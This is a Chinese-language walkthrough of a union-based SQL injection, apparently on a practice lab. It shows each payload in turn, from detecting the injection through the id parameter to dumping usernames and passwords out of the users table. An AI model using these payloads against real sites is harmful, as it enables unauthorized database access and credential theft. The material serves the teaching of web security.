1、提示我们需要传递一个id的参数
?id=1
2、判断是什么类型的注入(字符or整形)结果:存在字符型注入
?id=1'
?id=1' --+
3、使用联合查询,查看有几列。结果:有3列
?id=1 ' order by 4 --+
4、查看这3列中哪几列会在页面显示 (由于写入id=整形数值,会出现先对应的name和password,所以这里我们构造id=字符)结果:第2,3列会显示在页面是上
?id=a' union select 1,2,3 --+
5、接着查询数据库名
?id=a' union select 1,2,database()--+
6、 接着是查询该库中的表名,可能有多张表,这里有4张表,我们猜测重要数据会在users表中
?id=a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
7、接着查询users 表中的字段,得到了表中的字段,可以看到username,password里面的信息可能是我们想要的
?id=a' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
8、查询users表中字段里面的信息(在这里加上id是为更好的分隔开用户名和密码),最终我们拿到了用户名和密码
?id=a' union select 1,2,group_concat(username,id,password) from users--+
